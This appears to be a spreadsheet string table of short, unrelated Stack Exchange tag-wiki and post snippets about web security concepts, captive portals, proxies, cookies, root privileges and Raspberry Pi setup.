CSP is implemented in Firefox 4+ (X-Content-Security-Policy), Google Chrome 16+ (X-WebKit-CSP) and Internet Explorer 10+ (X-Content-Security-Policy).</t>
  </si>
  <si>
    <t>Cydia - The jailbreak 'App Store' equivalent
iOS JB Wiki - Wikipedia page with history, definitions, and general info on jailbreaking
As a disclaimer, jailbreaking will void any warranty you have on your device.</t>
  </si>
  <si>
    <t>Interceptors are used to implement cross-cutting concerns, such as logging, auditing, and security, from the business logic.</t>
  </si>
  <si>
    <t>The work we do there is responsible for keeping the network as clean as it is today, and as a moderator I'd like to take that impetus and take it further, onto helping to keep the site clean of more than just spam.</t>
  </si>
  <si>
    <t>The library system uses a captive portal web page to login.</t>
  </si>
  <si>
    <t>Applets are either sandbox applets or privileged applets.</t>
  </si>
  <si>
    <t>Captive portals are pages to which users are redirected to until they are logged in.</t>
  </si>
  <si>
    <t>Google Apps domain profile data   The domain admin has enabled external contact and profile sharing of domain-scoped data.</t>
  </si>
  <si>
    <t>Since web browser itself is an application, how can i assign "root" privileges to it when it tried to render a web page ?</t>
  </si>
  <si>
    <t>Cross Site Request Forgery is a malicious attack to exploit a website's trust in a user's browser.</t>
  </si>
  <si>
    <t>Prevent users from posting links
to known phishing pages from your site.</t>
  </si>
  <si>
    <t>Related Tags:
http
cookie
session-cookies</t>
  </si>
  <si>
    <t>The [tag:spectre] tag is reserved for questions related to the security vulnerability.</t>
  </si>
  <si>
    <t>Prevention
Preventing CSRF and XSRF Attacks
Cross-Site Request Forgery (CSRF) on OWASP
History
CSRF vulnerabilities have been known and in some cases exploited since 2001.</t>
  </si>
  <si>
    <t>Currently I have learned how to config my Pi to connect to the WIFI with or without a password, however when I wanna use the WIFI in, say a coffee house or a hotel, where the WIFI provided requires logging on a captive portal to get to use it, I know that with a browser it could be easy to do it since the login page appears right up as you open the browser, but how can I do it with my Pi through the command line?</t>
  </si>
  <si>
    <t>If your question is not directly related to programming, check if the question fits better on https://crypto.stackexchange.com/ or https://security.stackexchange.com/</t>
  </si>
  <si>
    <t>To determine if a URL is on any of the Safe Browsing lists, clients can send URLs to the Google Safe Browsing server to check their status or download encrypted versions of the Safe Browsing lists for local, client-side checks of URLs.</t>
  </si>
  <si>
    <t>The permissions have different levels, such as read-only and contribute:
http://office.microsoft.com/en-001/windows-sharepoint-services-help/permission-levels-and-permissions-HA010100149.aspx
Access to the library may be granted for a document, list item or a whole folder:
http://office.microsoft.com/en-001/sharepoint-server-help/manage-permissions-for-a-list-library-folder-document-or-list-item-HA010021564.aspx
You may also grant access to external users (given right permissions)
http://office.microsoft.com/en-001/sharepoint-server-help/sharepoint-document-libraries-i-introduction-to-sharing-files-RZ010234528.aspx?section=3
Sharepoint libraries accept selected file types and some document types, like .aspx may be added to a Sharepoint library:
http://office.microsoft.com/en-001/office365-sharepoint-online-small-business-help/types-of-files-that-cannot-be-added-to-a-list-or-library-HA101907868.aspx
Their content may be accessed by apps you are developing, e.g.</t>
  </si>
  <si>
    <t xml:space="preserve">
I'm working on a Security System using Arduino uno board, Arduino ethernet shield and dcs-930L Ip camera, and a servo motor, i have the address t directly access video and photos directly from web browser, i used ethernet shield to setup a website so that i can control the servo it actually works, so what I would like to do is set up a button so that when clicked it give me a video/image from my ip camera it can either be inside the same Arduino website or open another window browser!</t>
  </si>
  <si>
    <t>Now I edited /privoxy/templates/blocked so that instead of the usual site it will give me a redirect to a certain site should a link be opened that is not on the whitelist: 
example.com being one of the sites I whitelisted.</t>
  </si>
  <si>
    <t>Assuming you get that working, any browser that connects to your "captive portal" is going to throw SSL certificate errors left and right because your server is doing exactly what TLS is designed to prevent - impersonating another web site.</t>
  </si>
  <si>
    <t>A standalone Date/Time library that allows access to dates outside the normal PHP limits
A session management library that allows sessions to be encrypted and/or stored inside a database table.</t>
  </si>
  <si>
    <t>Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by your browser and used with that site.</t>
  </si>
  <si>
    <t>tag-a.tag
tag-b.tag
I've tried using a mixin but I think this would need to be registered in a parent tag?</t>
  </si>
  <si>
    <t>Akismet is a web service that helps prevent spam comments on your web site.</t>
  </si>
  <si>
    <t>End-users access Microsoft CRM in one of three ways:
Via a web browser - The currently supported browsers include Internet Explorer 7.0 or later, FireFox, and Chrome (on Windows XP or later) and Safari (on Mac OS X 10.7 or later) and Chrome.</t>
  </si>
  <si>
    <t>Clickjacking (User Interface redress attack, UI redress attack, UI redressing) potentially revealing confidential information or taking control of user computer while clicking on seemingly innocuous web pages.</t>
  </si>
  <si>
    <t>Elevated privileges are higher privileges, offered by an operating system, usually higher than normal user's privileges.</t>
  </si>
  <si>
    <t>Here is the PHP script:
Here are related permissions:
drwxrwxrwt  15 root root  4096 Nov 23 16:17 tmp
drwxr-xr-x  12 root root  4096 Nov  3 13:58 var
-rwxrw-rw- 1 nobody nogroup 320855 Nov 23 15:31 sample.pdf</t>
  </si>
  <si>
    <t>You can choose which websites to assign to the Intranet, Trusted, or Restricted zones.</t>
  </si>
  <si>
    <t>Its homepage is at https://www.phpmanager.xyz
Use it to:
Register PHP with IIS;
Validate and properly configure existing PHP installations;
Run multiple PHP versions side by side on the same server and even within the same web site;
Check PHP runtime configuration and environment (output of  function)
Configure various PHP settings
Enable or disable PHP extensions
Remotely manage PHP configuration in php.ini file</t>
  </si>
  <si>
    <t>Safari version 10.0 released at October 31, 2017, use this tag in addition of safari tag when you want to ask specific question related with this version.</t>
  </si>
  <si>
    <t>CSP is an abbreviation for content security policy, a mechanism to prevent XSS attacks by injected JavaScript.</t>
  </si>
  <si>
    <t>Update:(1)
It is called a Captive Portal:
The captive portal technique forces an HTTP client on a network to see a special web page (usually for authentication purposes) before using the Internet normally.</t>
  </si>
  <si>
    <t>Websites that are hosted on servers where many other peoples sites are hosted can have specific problems due to security concerns, lack of control of installed libraries, no root access etc.</t>
  </si>
  <si>
    <t>Resources
Site Compatibility and IE8
Standards Compliance Updates in Internet Explorer 8
Internet Explorer Namespace Support
CSS Improvements in Internet Explorer 8
What Happened to Operation Aborted?</t>
  </si>
  <si>
    <t>Features
Lightweight and Heavyweight Component
Flash Support
Browser Events
DOM Access
JavaScript Dialogs
Proxy, Basic, Digest, and NTLM authentication
Zooming
Accurate Web Display
Cookies
Bidirectional JavaScript-Java Bridge
Custom Context Menu
HTML to Image
Console Listener
Load Handler
Saving a Web Page
Web Standards
Proxy Settings
Java Web Start and Java Applet
Pop-ups
User-agent
File Download and Upload
Keyboard and Mouse Events Filter</t>
  </si>
  <si>
    <t>Cryptographic libraries
crypto-arduino-library http://code.google.com/p/crypto-arduino-library/ (not maintained since 2010)
matrixssl
mbed TLS (formerly PolarSSL)
wolfSSL (formerly CyaSSL)
 Discussions
Following is a list of discussions to get you started:
HTTPS alternative on Arduino
SSL from a Microcontroller
Lightweight Packet Encryption
Many of these libraries would still need to be adapted, but community experts can help you with that fairly quickly.</t>
  </si>
  <si>
    <t>Web crawling is a component of web scraping across multiple sites, indexing information on the web using a bot or "spider" and is a universal technique adopted by most search engines while honouring exclusion requests such as those published a  file place on the site.</t>
  </si>
  <si>
    <t>If you can configure your edge devices to use a web proxy, then a forward proxy server like squid could handle the connectivity for the devices, because the IP path between a device and a forward proxy is a connection involving only the device and proxy IPs.</t>
  </si>
  <si>
    <t>Phishing is typically carried out by email spoofing or instant messaging, and it often directs users to enter details at a fake website whose look and feel are almost identical to the legitimate one.</t>
  </si>
  <si>
    <t>Proxylocal is a website 'proxylocal.com' which provide service to proxy your local web-server and make it publicly available over the internet.</t>
  </si>
  <si>
    <t>Questions using this tag should be specific to Intel Fortran, Intel Visual Fortran, and/or Compaq Visual Fortran (predecessor to Intel Visual Fortran), rather than being general questions about Fortran on Intel hardware.</t>
  </si>
  <si>
    <t>I believe that community moderation is key to keeping clean content and that users are capable of coming back from question bans given the right opportunities.</t>
  </si>
  <si>
    <t>My web application traffic is 4-5 devices @ most -tablet/pc's -, yet my application is a bit complex and run lots of data analysis and data mining and its mysql database is growing (50k+ rows in 20 tables)
Optimum solution i would think of is an OS including my server and all its files encrypted and secured against copy/read, once it power up it only brings a web browser directed to the local server web page and that's it.. no any other operation allowed by the normal user other than using browser and connecting to WiFi.</t>
  </si>
  <si>
    <t>PHP security specific questions regarding topics such as PHP encryption, PDO/Mysqli Prepared Statements, and handling data to guard against xxs attacks.</t>
  </si>
  <si>
    <t>WebDAV (World Wide Web Distributed Authoring and Versioning) is the Internet Engineering Task Force (IETF) standard for collaborative authoring on the Web: a set of extensions to the Hypertext Transfer Protocol (HTTP) that facilitates collaborative editing and file management between users located remotely from each other on the Internet.</t>
  </si>
  <si>
    <t>Prior Experience in Moderation: I've been a Moderator on Super User since the past 2 years and on Web Apps for about half a year and I know and understand very well what it takes to be a Moderator.</t>
  </si>
  <si>
    <t>Questions specifically about NTRUEncrypt which are not related to code should be asked on https://crypto.stackexchange.com/</t>
  </si>
  <si>
    <t>This tag is for questions about *programming* the Metasploit framework, not for using the framework or attacking a specific site.</t>
  </si>
  <si>
    <t>Privileged applets do not have the security restrictions that are imposed on sandbox applets and can run outside the security sandbox.</t>
  </si>
  <si>
    <t>Tools to block advertisements include:
Native in-browser tools (Opera's content blocker, IE9's tracking protection)  
Browser add-ons (AdBlock Plus)
Greasemonkey scripts
External applications (AdMuncher)
System level IP/Domain filtration (via firewall, or editing Hosts file)
Adblockers have significant impact on website monetisation, and thus - are frequently tried to be circumvented by certain website authors / owners.</t>
  </si>
  <si>
    <t>A web search engine that utilizes slashtags to draw results from a curated list of trusted websites.</t>
  </si>
  <si>
    <t>For questions related to privacy (user permissions / security techniques, internet tracking system such as Cookies, Web bugs etc.)</t>
  </si>
  <si>
    <t>Tag usage:
The tag logout can be used for web based programming problems related to logging out.</t>
  </si>
  <si>
    <t>Today, most proxies are web proxies, facilitating access to content on the World Wide Web.</t>
  </si>
  <si>
    <t>Profiling modes There are four different profiling modes in JProfiler: Attach mode, Profile at startup, Prepare for profiling and Offline profiling
References
JProfiler Official Page</t>
  </si>
  <si>
    <t>It is rare to log in directly as root, but rather, users who are privileged enough gain root access for one command with sudo sudo, or log into a temporary root shell with su su.</t>
  </si>
  <si>
    <t>It is capable of:
extracting document information (title, author, ...),
splitting documents page by page,
merging documents page by page,
cropping pages,
merging multiple pages into a single page,
encrypting and decrypting PDF files.</t>
  </si>
  <si>
    <t>server folder and xampp be given admin privileges and encrypted and auto run on system start-up even if admin does not log in (in case computer restart while i'm not @ office) and normal guest user can use computer as much as he want as long as he is not touching my xampp folder 
This can also be useful for developers struggling to sell php applications without giving out source code</t>
  </si>
  <si>
    <t>A 100% safe application does not exist in the real world, but you can reduce the chances of your application being hacked by following below-mentioned standards:
Where PHP Security Could Fail Or Be Vulnerable Part 1
Where PHP Security Could Fail Or Be Vulnerable Part 2
In the above links, common vulnerabilities and countermeasures are mentioned.</t>
  </si>
  <si>
    <t>Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications that enables malicious attackers to inject client-side script into web pages viewed by other users.</t>
  </si>
  <si>
    <t>A cryptographic token, or nonce, is a value that is inserted by a server into outgoing web pages that the browser is required to return with a form submission or AJAX request to prevent CSRF attacks.</t>
  </si>
  <si>
    <t>Nginx ("engine x") is a web server, reverse proxy, TCP stream proxy and mail proxy, released under a BSD-like license.</t>
  </si>
  <si>
    <t>Either log in as root, or run the program with sudo, because usually permission denied means you need root permissions, sudo runs that specific program with root permissions if you don't want to log in as root.</t>
  </si>
  <si>
    <t>My question is how safe would it be to publicly expose the flask server through port forwarding and what could I do to make this safe or safer?</t>
  </si>
  <si>
    <t>I'm trying to host 2 websites, using 2 legitimate domains that are registered and are indeed working, my issue is that when I try to load the second domain it redirects to the first one instead of loading the second.</t>
  </si>
  <si>
    <t>Sorry to be there bearer of bad news, but it looks like your copy of /lib/lsb/init-functions has been backdoored and is trying to run malicious code from a random website
The site serving the malicious code is probably dead which causes the syntax error.</t>
  </si>
  <si>
    <t>The google-trusted-stores tag should be used for questions related to integration with the Google Trusted Stores program for E-Commerce retailers</t>
  </si>
  <si>
    <t>The Internet Content Adaptation Protocol (ICAP) is a lightweight HTTP-like protocol specified in RFC 3507 which is used to extend transparent proxy servers, thereby freeing up resources and standardizing the way in which new features are implemented.</t>
  </si>
  <si>
    <t>(the avalanche effect)
Common hash functions include:
MD5 (128-bit output, tag: md5; vulnerabilities found)
SHA-1 (160-bit output, tag: sha-1; vulnerabilities found)
SHA-2, including SHA-512 (512-bit output, tag: sha-512)
RIPEMD-160 (160-bit output, tag: ripemd)
There are also some other notable hash functions which are less mature:
SHA-3/Keccak, winner of the NIST hash function competition (tag: sha-3)
Applications
While there are many uses for cryptographic hash functions, here are a selected few:
In combination with a salt, it can be used to store passwords.</t>
  </si>
  <si>
    <t>Answering my own question:
The user I was using had the same UID as root, 0, therefore the console displays the logged in user as root, even though you are logged in as another user!</t>
  </si>
  <si>
    <t>And also accurate, with 99.23% approved flags network-wide (of 14k, 12k of which are on SO with ~100 SD autoflags)
I participate in a couple moderation-related chat rooms, so I have experience with different aspects of moderation
I enjoy reviewing stuff, keeping the site clean
I always try to follow pre-defined rules and guidelines
My answers are here</t>
  </si>
  <si>
    <t>I suggest that the login system will generate a session cookie, but instead of using it as a cookie, put to the redirect.</t>
  </si>
  <si>
    <t>Logging out may be performed in following ways:
Using an appropriate command
Clicking a website link 
Powering off his or her workstation
Closing a web browser window
Leaving a website, or not refreshing a webpage within a defined period.</t>
  </si>
  <si>
    <t>Questions about the security of the protocol are best asked either on security.stackexchange.com or crypto.stackexchange.com.</t>
  </si>
  <si>
    <t>Useful links
Official website
Arduino.cc
Wikipedia
Related tags
intel
intel-edison</t>
  </si>
  <si>
    <t>Safari 11 includes several new features such a Intelligent Tracking Prevention feature which prevents websites from cross-site tracking:
prevents audio from auto-playing on "most" websites, according to Apple.</t>
  </si>
  <si>
    <t>NinjaKit is a Safari extension that allows you to enhance the way web-pages work, by running javascript (with enhanced privileges) on websites that you specify.</t>
  </si>
  <si>
    <t>Safari version 6 released at July 25, 2012, use this tag in addition of safari tag when you want to ask specific question related with this version.</t>
  </si>
  <si>
    <t>Questions should use this tag if the question is directly related to an aspect of SecureTrading or it's services.</t>
  </si>
  <si>
    <t>You can do this going to it with a web browser like Chrome and clicking on the "Secure" field in the address bar (in Chrome's case).</t>
  </si>
  <si>
    <t>When all links are valid, the static file is copied to the local web site or optionally uploaded via FTP to a remote web site.</t>
  </si>
  <si>
    <t>Refers to questions about preventing, detecting, handling, controlling, etc:
The back button on web browsers
History of visited sites
Backing out of a "dirty" page
The hardware or software back button on smartphones and other similar devices
Navigation in Android/IOS applications
Returning to the previous view
Exiting the application (Android)
et cetera.</t>
  </si>
  <si>
    <t>From a basic computer, when I'm connected to the network and I do an Internet request (for example, I search "bl" on google), I got a page like this : https://url:1003/fgtauth?12291a0aff04200a
So, we see in this page that we get a "magic value" that is in fact an id for the session.</t>
  </si>
  <si>
    <t>I chose the 'via SSH' option, using the following details:
(I've removed my login details)
However, using the exact same details with SequelPro, it works just fine?</t>
  </si>
  <si>
    <t>web browser - WebDriver support
Web browser that aims to build a safer, faster, and more stable internet browsing experience.</t>
  </si>
  <si>
    <t>Web scraping is the process of extracting specific information from websites that do not readily provide an API or other methods of automated data retrieval.</t>
  </si>
  <si>
    <t>To add a website to a security zone
Open Internet Explorer by clicking the Start button Picture of the Start button.</t>
  </si>
  <si>
    <t>U2F is built to protect against phishing and man-in-the-middle attacks, allowing one U2F authenticator to access any number of services without any shared secrets.</t>
  </si>
  <si>
    <t>A more interesting Unison profile that could be used for automating backups to a remote server could look something like this:
# profile.prf
root = /home/user
root = ssh://user@198.51.100.42//home/user
sshargs = -C -i /path/to/ssh_key
path = Documents
ignore = Path Documents/secrets
ignore = Name *.tmp
ignore = Name {.</t>
  </si>
  <si>
    <t>This tag relates to Questions regarding identification systems usually used to track inventory.</t>
  </si>
  <si>
    <t>If your question is about attacking a specific system, such questions are off-topic on Stack Overflow.</t>
  </si>
  <si>
    <t>By default MIDlet suites
are not trusted, and are assigned to
untrusted domains that prevent access
to any privileged functionality.</t>
  </si>
  <si>
    <t>Use of this tag is appropriate for any context where the question involves processing a list of words, but other tags, such as 'puzzles', 'security' or 'spell-checker' may attract a more specialized audience and these tags should be used instead.</t>
  </si>
  <si>
    <t>PCLCrypto is an open source library that provides portable class library authors with cryptographic APIs that invoke platform-specific crypto automatically.</t>
  </si>
  <si>
    <t>The risk of such attacks can be minimized by careful Web server programming, the installation of software updates and patches, filtering of input from browsers, and the use of vulnerability scanners.</t>
  </si>
  <si>
    <t>The OASIS committee has identified and defined several ancillary profiles that extend the core XACML 3.0 specification for specific domains, such as the Administration and Delegation Profile, the SAML Profile, the Core and Hierarchical Role Base Access Control (RBAC) Profile, the Intellectual Property Control (IPC) profile, and the Export Compliance-US (EC-US) Profile.</t>
  </si>
  <si>
    <t>Two versions of cookies are supported:
Version 0: This version refers to traditional or old-style cookies, the original cookie format defined by Netscape.</t>
  </si>
  <si>
    <t>When cookie is set, it is reported back by the browser:
 Cookie: someName=someValue; someOtherName=someOtherValue
For more security, cookies can be restricted to some domain and path:
 Set-Cookie: name=value; domain=www.foo.com; Path=/hereonly
They can also have additional secure (HTTPS only but accessible through JavaScript) and httponly (HTTP or HTTPS but not accessible through JavaScript) attributes:
 Set-Cookie: goldlocation=somewhere; Domain=.morgan.com; secure; httponly
In this example the cookie is accessible for all subdomains of morgan.com but only through HTTPS and not accessible from JavaScript.</t>
  </si>
  <si>
    <t>Some of its feature highlights are:
Draft and Schedule Site Design Customizations
Collaborate with Design Preview Links
Design Locking to guard Changes
A Prompt to Protect unsaved Work
New Gallery Widget
For Developers:
Code syntax highlighting and error checking
Sandbox for Safety
Resources
Release Notes for version 4.9
Official Website</t>
  </si>
  <si>
    <t>Anybody who connects to my access point, gets redirected to my Captive Portal(Landing Page).</t>
  </si>
  <si>
    <t>We don't get many questions on OAuth 1(a) but feel free to tag them here.</t>
  </si>
  <si>
    <t>For questions regarding the implementation of spell-checking mechanisms.</t>
  </si>
  <si>
    <t>For questions regarding SSL in general, use the [ssl] tag.</t>
  </si>
  <si>
    <t>$HOME/.profile, also known as ~/.profile, is run exactly once per session -- when you login.</t>
  </si>
  <si>
    <t>Navigate to the website that you want to add to a specific security zone.</t>
  </si>
  <si>
    <t>This tag is currently ambiguous and seldom used; consider another tag such as:
ms-access for Microsoft Access questions
authorization for security access questions</t>
  </si>
  <si>
    <t>Cookies can be used to remember the state of the session, such as authentication, state of  GUI controls and personalization through user preferences.</t>
  </si>
  <si>
    <t>This tag is for Access-specific questions regarding VBA usage in Access.</t>
  </si>
  <si>
    <t>Cryptography questions not directly related to software development are better asked at crypto.stackexchange.com.</t>
  </si>
  <si>
    <t>This tag may pertain to questions about preventing, detecting, removing, or otherwise dealing with unwanted duplicates, or adapting to safely allow duplicates.</t>
  </si>
  <si>
    <t>Server-side scripting is a web server technology in which a user's request is verified by running a script directly on the web server to generate dynamic web pages.</t>
  </si>
  <si>
    <t>The Session object is not intended to be thread-safe, instead a new/current Session should be obtained from the session factory for each thread/transaction.</t>
  </si>
  <si>
    <t>Quoting its GitHb page:
The cfajaxproxy tag provides the ability to create a JavaScript
  proxy "class" which can be used to create proxy objects which in turn
  proxy for a ColdFusion CFC back on the ColdFusion server.</t>
  </si>
  <si>
    <t>A web bug is an object that is embedded in a web page or email and is usually invisible to the user but allows checking that a user has viewed the page or email.</t>
  </si>
  <si>
    <t>Examples of unsafe web resources are social engineering sites (phishing and deceptive sites) and sites that host malware or unwanted software.</t>
  </si>
  <si>
    <t>An aspect is a module implemented in an Aspect-Oriented Programming language that contains code for a cross-cutting concern, like logging or security.</t>
  </si>
  <si>
    <t>Resources:
RFC 1928 SOCKS Protocol Version 5
RFC 1929 Username/Password Authentication for SOCKS V5
RFC 1961 GSS-API Authentication Method for SOCKS Version 5
RFC 3089 A SOCKS-based IPv6/IPv4 Gateway Mechanism</t>
  </si>
  <si>
    <t>Official Website: http://continuum.apache.org/
Useful Links:
Documentation
Quick Start
User Guides
Installation
Admin Guides
Developer Guides
FAQ
Security Vulnerabilities</t>
  </si>
  <si>
    <t>I want to pass login information through a URL in order to login to a website and directly access a specific page on that website.</t>
  </si>
  <si>
    <t>Should this proxy fail to respond, the browser tries to contacts the Web-site directly, without using a proxy.</t>
  </si>
  <si>
    <t>It is a common part of an operating system's Internet Protocol (IP) implementation, and serves the function of translating human-friendly hostnames into numeric protocol addresses, called IP addresses, that identify and locate a host in an IP network.</t>
  </si>
  <si>
    <t>*/
    perror(error_string);
    return retval;
}
Save the above as something like nmap_lan.c, and compile with:
$ gcc -Wall -o nmap_lan nmap_lan.c
Then, move it to wherever you keep your Web site's scripts, and as root, change its ownership and permissions:
# chown root:root nmap_lan  # Or whatever group name you use.</t>
  </si>
  <si>
    <t>Questions that involve vulnerability scanning, offensive security, exploit development, etc., might fall under this tag.</t>
  </si>
  <si>
    <t>For questions and techniques related to logging into websites programmatically</t>
  </si>
  <si>
    <t>Cross-site request forgery, also known as a one-click attack or session riding</t>
  </si>
  <si>
    <t>Browsers are recommended to allow at least 20 cookies per domain and 4KB per cookie.</t>
  </si>
  <si>
    <t>Manufacturer-Monitored Tags
These tags are used for developer assistance by Android device manufacturers for their specific devices:
Amazon: amazon amazon-appstore kindle-fire
Asus: asus
HTC: htc htcdev
Sony: sony sony-xperia sony-smartwatch
Google Nexus: google-nexus
Google Pixel: google-pixel
Samsung: samsung-mobilesamsung-touchwiz
Meizu: meizu
Motorola: motorola
Nokia: nokia
LG: lg
Huawei: huawei
OnePlus: oneplusoneoneplustwooneplusthree
Oppo: oppo
Xiaomi: xiaomi
ISV-Monitored Tags
These tags are meant for libraries, services, etc.</t>
  </si>
  <si>
    <t>Questions requesting assistance with compromised sites rarely belong on Stack Overflow and generally should go to the sister site security.stackexchange instead.</t>
  </si>
  <si>
    <t>Normally after login, the web server generates a random session cookie, and that is authenticating the browser to the server.</t>
  </si>
  <si>
    <t>When I first logged on, I used the basic login and pass "admin" (both places).</t>
  </si>
  <si>
    <t>Clickjacking is a malicious technique of tricking a Web user into clicking on something different from what the user perceives they are clicking on.</t>
  </si>
  <si>
    <t>Any server in which input data from Web browsers is not validated is vulnerable to this type of attack.</t>
  </si>
  <si>
    <t>Question not related to programming that are about the cipher are best asked on crypto.stackexchange.com</t>
  </si>
  <si>
    <t>Use this tag for SNMP related questions that concern Trap messages.</t>
  </si>
  <si>
    <t>DomSanitizer helps preventing Cross Site Scripting Security bugs (XSS) by sanitizing values to be safe to use in the different DOM contexts.</t>
  </si>
  <si>
    <t>Multiple websites can even be "mashed up" via cross-site scripting techniques.</t>
  </si>
  <si>
    <t>Related tags
proxy
proxy-authentication
http-status-code-401
See also RFC2616.</t>
  </si>
  <si>
    <t>Click the Security tab, and then click a security zone (Local intranet, Trusted sites, or Restricted sites).</t>
  </si>
  <si>
    <t>For example, one could use this tag when posting a question related to how his subnet can have Internet access.</t>
  </si>
  <si>
    <t>Some Greenlock Links:
Greenlock for Web Servers
Greenlock for node.js
Greenlock for Web Browsers
Greenlock for API Integrations
See also lets-encrypt.</t>
  </si>
  <si>
    <t xml:space="preserve">
Use SSL (secure transmission) - not perfect but will stop a lot
Use a 'nonce' (https://security.stackexchange.com/questions/30519/prevent-cross-domain-form-submission-with-nonce plus google).</t>
  </si>
  <si>
    <t>ISP or Internet Service Provider is an organization that offers users access to the Internet and related services such as Internet access, Internet transit, domain name registration and hosting, dial-up access, leased line access and collocation.</t>
  </si>
  <si>
    <t>JSONP or "JSON with padding" is a communication technique used in JavaScript programs running in web browsers to request data from a server in a different domain, something prohibited by typical web browsers because of the same-origin policy.</t>
  </si>
  <si>
    <t>These are minimum requirements needed for OpenCart:
Web Server (Apache suggested)
PHP (at least 5.4)
cURL enabled
Database (MySQLi suggested)
Other required, optionally required or preferred settings:
 OFF
magic_quotes_gpc OFF
file_uploads ON
session_auto_start OFF
mcrypt library loaded
zlib library loaded (for output compressing)
There is a large number of community made 'extensions' that expand OpenCart, both paid and free.</t>
  </si>
  <si>
    <t>A proxy auto-config (PAC) file defines how web browsers and other user agents can automatically choose the appropriate proxy server (access method) for fetching a given URL.</t>
  </si>
  <si>
    <t>Now let's come back to IEEE 802.11i:
In Annex H (informative), "RSNA reference implementations and test vectors", section "H.4 Suggested pass-phrase-to-PSK mapping" (remember that the purpose of the passphrase, mathematicaly massaged with the SSID, is to derive a PSK (Pre-Shared Key), more useful for 802.11 operation but much less user-friendly than "a damned simple passphrase that I can type with a damned keyboard").</t>
  </si>
  <si>
    <t>Content Security Policy (CSP) aims to mitigate the risk of cross-site scripting attacks by giving developers fine-grained control over the resources a page is allowed to load, as well as the script it's allowed to execute.</t>
  </si>
  <si>
    <t>The page token I got from https://developers.facebook.com/tools/explorer/ (select the app needed, then select which page token I want to generate and make it into a permanent token).</t>
  </si>
  <si>
    <t>RP-Main acts as a reverse-proxy server using Apache to route requests for Domain A to RP-0 and Domain B to RP-1.</t>
  </si>
  <si>
    <t>For questions regarding the safety and (safe) implementation of double-checked locking.</t>
  </si>
  <si>
    <t>web2py web2py
web2py is a free open-source full-stack framework for rapid development of fast, scalable, secure and portable database-driven web-based applications.</t>
  </si>
  <si>
    <t>If you are at ssh and have root privileges, just nano /etc/passwd (i feel evil typing that haha), otherwise if there is another user with root privileges (other than pi) login in as them and edit the passwd file.</t>
  </si>
  <si>
    <t>Use this tag when you see a message in the browser devtools console about CORS (Cross-Origin Resource Sharing)  e.g., your browser logged an error about Access-Control-Allow-Origin, and you want to know how to eliminate the error.</t>
  </si>
  <si>
    <t>The security model is designed to protect the user from malicious Web sites, and as a result, it enforces strict limits on what the page author is allowed to do.</t>
  </si>
  <si>
    <t>This interface is intended to provide access to the Pi (time- and web server, SSH) via the Internet.</t>
  </si>
  <si>
    <t>The device will think it has full Internet access and will not pop up a captive portal login window.</t>
  </si>
  <si>
    <t>Cryptojacking is the act of a hacker having injected a script in a web application which causes that all the website visitors will in their webbrowser (via JavaScript) run cryptocurrency mining on behalf of the hacker.</t>
  </si>
  <si>
    <t>If I recall correctly, in Raspbian default settings, only root can access the GPIO pins; if you're running Python as root but your MySQL process is running without root privileges, that could explain the discrepancy.</t>
  </si>
  <si>
    <t>The Internet Content Adaptation Protocol (ICAP) is a lightweight HTTP-like protocol used to extend transparent proxy servers, thereby freeing up resources and standardizing the way in which new features are implemented.</t>
  </si>
  <si>
    <t>While web scraping is not illegal on its own, legal issues can arise if being done with malicious or plagiaristic intentions, to circumvent a sites purchasing system or subscription fees, or other fraudulent or maligned purposes.</t>
  </si>
  <si>
    <t>How it works in real servers
This secret is called session cookie in usual web servers.</t>
  </si>
  <si>
    <t>The SameSite attribute on the Set-Cookie header instructs the browser to either restrict that cookie to first-party / same-site contexts or allow it in third-party / cross-site contexts.</t>
  </si>
  <si>
    <t>This tag is for programming questions related to detecting and preventing fraud.</t>
  </si>
  <si>
    <t>[1] It is a Candidate Recommendation of the W3C working group on Web Application Security, widely supported by the modern web browsers.</t>
  </si>
  <si>
    <t>PS: The login page and the main-page( the one that is used to re-direct to the appropriate website served by one of the Arduinos in the LAN) are hosted on a different server.</t>
  </si>
  <si>
    <t>By adding a website to a specific zone, you can control the level of security used on that site.</t>
  </si>
  <si>
    <t>It is represented as a checkbox labeled "remember me" and stores either the username or a login token to re-login the user when visiting the website again.</t>
  </si>
  <si>
    <t>Logging, caching, security, and transaction management are examples of cross-cutting concerns.</t>
  </si>
  <si>
    <t>It is often used to execute untested code, or untrusted programs from unverified third parties, suppliers, untrusted users and untrusted websites.</t>
  </si>
  <si>
    <t>Useful links:
Official website
Official Reference Manual
Free OWASP ModSecurity Core Rule Set (CRS)</t>
  </si>
  <si>
    <t>Cross-site Request Forgery (CSRF) is using malicious HTML or Javascript content to trick a user's browser into submitting a form to a 3rd party site.</t>
  </si>
  <si>
    <t>Content Security Policy (CSP) is an added layer of security that helps to detect and mitigate certain types of attacks, including Cross Site Scripting (XSS) and data injection attacks.</t>
  </si>
  <si>
    <t>Alternative names are web beacon, tracking bug, and tag or page tag.</t>
  </si>
  <si>
    <t>Use this tag for questions involving using sharepoint as the tool to support a Wikipedia-like document corroboration web site.</t>
  </si>
  <si>
    <t>Use this tag if your question deals specifically to ASP.NET Identity 2 features.</t>
  </si>
  <si>
    <t>Use this tag if your question deals specifically to ASP.NET Identity 3 features.</t>
  </si>
  <si>
    <t>Questions specific to the OAuth or REST APIs documented here: https://app.clio.com/api/v4/documentation 
Clio is in the process of shifting over to the new Clio API V4 and preparing to deprecate Clio API V2 in October 2018.</t>
  </si>
  <si>
    <t>You will probably need to run as root or sudo as changing ownership away from root without being root is discouraged.</t>
  </si>
  <si>
    <t>Frequently-asked questions
If you are new to Apache Subversion or version-control in general please take some time to read the SVNBook.</t>
  </si>
  <si>
    <t xml:space="preserve"> uses an authentication ticket that is created when a user logs on to a site, and then it tracks the user throughout the site.</t>
  </si>
  <si>
    <t>Got a login to my site, when logged in, i would like the website to send an sms automatically, then retrieve the answer and display it on the website.</t>
  </si>
  <si>
    <t>Native Client (NaCl) is an open source project that uses Software Fault Isolation (SFI) to sandbox untrusted machine code and allow such to run within the context of applications such as the Chrome web browser.</t>
  </si>
  <si>
    <t>I usually bring the rpi image up and copy it via rsync:
rsync -rl --delete-after --safe-links pi@192.168.1.PI:/{lib,usr} $HOME/raspberrypi/rootfs
where 192.168.1.PI is replaced by the IP of your Raspberry Pi.</t>
  </si>
  <si>
    <t>For stateful programmatic web browsing, such as working in an authenticated session, I would go with the Mechanize library.</t>
  </si>
  <si>
    <t>That local web server ignores any Uri details and serves a login prompt for every request.</t>
  </si>
  <si>
    <t>This is for questions and techniques related to logging into websites and online services programmatically.</t>
